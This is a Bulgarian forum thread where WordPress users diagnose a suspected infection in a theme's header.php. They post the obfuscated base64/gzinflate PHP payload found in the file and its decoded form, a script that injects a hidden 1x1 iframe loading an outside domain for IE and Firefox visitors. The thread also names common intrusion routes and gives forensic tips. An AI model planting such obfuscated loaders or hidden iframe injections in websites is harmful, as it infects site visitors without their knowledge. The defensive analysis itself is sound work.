Всъщност не е вирус, а брандиране на безплатна тема: p a s t e b i n.com/MPzmEqivТака, инсталирах току що аваст, ъпдейтна си дефинициите и отворих сайта - не реагира, всичко е вече наред. Благодаря на всички, които реагираха и обърнаха внимание на проблема ми.
Темата не е безплатна, платих я преди няколко седмици.Всъщност не е вирус, а брандиране на безплатна тема: p a s t e b i n.com/MPzmEqiv
Най-модерно е в момента сайтовете на уърдпрес да се пробиват или през js папката на уърдпрес или през "любимият" ми плъгин на готините теми thimthumb. Има редица теми за защита на системните папки на уърдпрес, дори самият аз подготвям една инсталация с вградени защити, че не ми се прави едно и също всеки път.
http://www.tareeinternet.com/scripts/decrypt.php
В този сайт можеш да декриптираш точно това , което ти трябва - направих го - вирус е !
Сега се мъча да открия нещо из темата на блога, намерих ето това странно нещо, което нищо не ми говори -
<script type='text/javascript' src='http://radkahair.org/wp-includes/js/jquery/jquery.js?ver=1.7.2'></script>
<?php
#c3284d#
echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
#/c3284d#
wp_head(); ?>
Възможно ли е това да е проблема? Файла е в (header.php)
Ако намерите такъв файл в сайта си, с подобни етикети може админите на хостинга да го проверят с командата stat и да извадят GET/POST заявките от сайтовете в акаутна от датата и часа на Change атрибута или да се проверят FTP логовете по това време.
Чисто теоретично, какъв е шанса дупката да не е в самата инсталация, а да го отнасят голяма част от клиентите на хостинга заради техен проблем?
Глупав.като спец ви гарантирам че няма аз го проверих с над 30 противовирусни програми и нито една не издаде и стон
като спец ви гарантирам че няма аз го проверих с над 30 противовирусни програми и нито една не издаде и стон
Стига де, някой изобщо направи ли опит да погледне какво съм пуснал в пейстбина? Това си е точно скрипт за footer.php на уърдпрес. Може и да е инжекция, може и да е така, но определено не е част от jquery.js.
Не те знам от де го взе тоя код и кво си декриптирал, ама я се пробвай да декриптираш зловредния код по-горе в този тул http://www.tareeinternet.com/scripts/decrypt.php като замениш echo и с eval.
<script>var url="h t t p://onmouseup.info/stats.php";
if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0))
{var f=document.createElement('iframe');
f.setAttribute("width","1");
f.setAttribute("height","1");
f.setAttribute("src",url);
f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");
document.getElementsByTagName("body")[0].appendChild(f)}
</script>
Мда, предходната програма за декодиране ми е изкарала съдържанието на ифрейм инжекцията директно. Ето го кода, не е точно вирус, но създава iframe с произволно съдържание. Мога да дам съвети за предпазване от js инжекции и писане в js папката на wordpress. Ето я гадината:
Аваст го е засичала за вирус понеже е декриптирала кода, и е засякла този сайт h t t p://onmouseup.info/stats.php Само тя ли декриптира base64? Явно върши добре работа.